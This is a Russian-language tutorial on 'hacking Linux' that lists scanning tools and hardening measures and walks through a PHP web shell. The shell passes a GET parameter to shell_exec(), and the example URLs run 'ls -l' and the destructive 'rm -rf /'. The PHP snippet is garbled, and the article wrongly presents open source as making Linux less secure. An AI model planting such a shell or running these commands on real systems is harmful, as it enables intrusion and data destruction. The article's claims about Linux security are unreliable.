Взлом ОС Linux: взлом с помощью Ubuntu (Руководство по командам)

Содержание:

Anonim

Linux - наиболее широко используемая серверная операционная система, особенно для веб-серверов. Это открытый исходный код; это означает, что любой может иметь доступ к исходному коду. Это делает его менее защищенным по сравнению с другими операционными системами, поскольку злоумышленники могут изучить исходный код для поиска уязвимостей . Linux для хакеров использует эти уязвимости для получения несанкционированного доступа к системе.

В этой статье мы познакомим вас с тем, что такое Linux, его уязвимостями безопасности, взломом с помощью Ubuntu и мерами противодействия, которые вы можете принять.

Темы, затронутые в этом руководстве

  • Краткое примечание по Linux
  • Инструменты взлома Linux
  • Как предотвратить взлом Linux
  • Хакерские действия: взломать систему Linux с помощью PHP

Краткое примечание по Linux

Linux - это операционная система с открытым исходным кодом . Существует множество дистрибутивов операционных систем на основе Linux, таких как Redhat, Fedora, Ubuntu и т. Д. В отличие от других операционных систем, Linux менее безопасен с точки зрения безопасности. Это связано с тем, что исходный код доступен бесплатно, поэтому его легко изучить на предмет уязвимостей и использовать их по сравнению с другими операционными системами, не имеющими открытого исходного кода. Linux можно использовать в качестве операционной системы сервера, настольного компьютера, планшета или мобильного устройства.

Программами Linux можно управлять с помощью графического интерфейса пользователя или команд. Команды Linux для взлома Kali Linux более эффективны и действенны по сравнению с использованием графического интерфейса. По этой причине полезно знать основные команды Linux для взлома.

Обратитесь к этим руководствам https://www.guru99.com/unix-linux-tutorial.html о том, как начать работу с хаками Kali Linux.

Инструменты взлома Linux

  • Nessus - этот инструмент можно использовать для взлома Ubuntu, настроек конфигурации сканирования, исправлений, сетей и т. Д. Его можно найти по адресу https://www.tenable.com/products/nessus
  • NMap. Этот инструмент можно использовать для мониторинга хостов, работающих на сервере, и служб, которые они используют. Его также можно использовать для поиска портов. Его можно найти на https://nmap.org/
  • SARA - SARA - это аббревиатура от Security Auditor's Research Assistant. Как следует из названия, этот инструмент можно использовать для аудита сетей на предмет угроз, таких как SQL Injection, XSS и т. Д., Его можно найти по адресу http://www-arc.com/sara/sara.html

Приведенный выше список не является исчерпывающим; он дает вам представление об инструментах, доступных для взлома Ubuntu и систем Linux.

Как предотвратить взлом Linux

Linux Hacking использует уязвимости в операционной системе. Организация может принять следующую политику для защиты от таких атак.

  • Управление исправлениями - исправления исправляют ошибки, которые злоумышленники используют для компрометации системы. Хорошая политика управления исправлениями гарантирует, что вы постоянно применяете соответствующие исправления к своей системе.
  • Правильная конфигурация ОС - другие эксплойты используют слабые места в конфигурации сервера. Неактивные имена пользователей и демоны должны быть отключены. Следует изменить настройки по умолчанию, такие как общие пароли для приложений, имена пользователей по умолчанию и некоторые номера портов.
  • Система обнаружения вторжений - такие инструменты могут использоваться для обнаружения несанкционированного доступа к системе. Некоторые инструменты могут обнаруживать и предотвращать такие атаки.

Хакерские действия: взломать систему Ubuntu Linux с помощью PHP

В этом практическом сценарии мы узнаем, как взломать Ubuntu, и предоставим вам основную информацию о том, как вы можете использовать PHP для компрометации Linux. Мы не собираемся нацеливаться ни на одну жертву. Если вы хотите попробовать, вы можете установить LAMPP на свой локальный компьютер.

PHP имеет две функции, которые можно использовать для выполнения хакерских команд Linux. Он имеет функции exec () и shell_exec (). Функция exec () возвращает последнюю строку вывода команды, в то время как shell_exec () возвращает весь результат команды в виде строки.

В демонстрационных целях предположим, что менеджеры злоумышленников загружают следующий файл на веб-сервер.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

ЗДЕСЬ,

Приведенный выше сценарий получает команду из переменной GET с именем cmd. Команда выполняется с помощью shell_exec (), а результаты возвращаются в браузере.

Вышеупомянутый код можно использовать, используя следующий URL-адрес

http: //localhost/cp/konsole.php? cmd = ls% 20-l

ЗДЕСЬ,

  • «… Konsole.php? Cmd = ls% 20-l» присваивает значение ls -l переменной cmd .

Команда в Ubuntu для взлома сервера будет выполняться как

shell_exec('ls -l') ;

Выполнение приведенного выше кода на веб-сервере дает результаты, подобные следующим.

Приведенная выше команда просто отображает файлы в текущем каталоге и разрешения

Предположим, злоумышленник передает следующую команду

rm -rf /

ЗДЕСЬ,

  • «Rm» удаляет файлы
  • «Rf» заставляет команду rm работать в рекурсивном режиме. Удаление всех папок и файлов
  • «/» Указывает команде начать удаление файлов из корневого каталога.

URL атаки будет выглядеть примерно так

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Резюме

  • Linux - популярная операционная система для серверов, настольных компьютеров, планшетов и мобильных устройств.
  • Linux имеет открытый исходный код, и исходный код может получить любой желающий. Это позволяет легко обнаружить уязвимости. Это одна из лучших ОС для хакеров.
  • Базовые и сетевые хакерские команды в Ubuntu очень ценны для хакеров Linux.
  • Уязвимости - это слабые места, которые можно использовать для компрометации системы.
  • Хорошая безопасность может помочь защитить систему от взлома злоумышленником.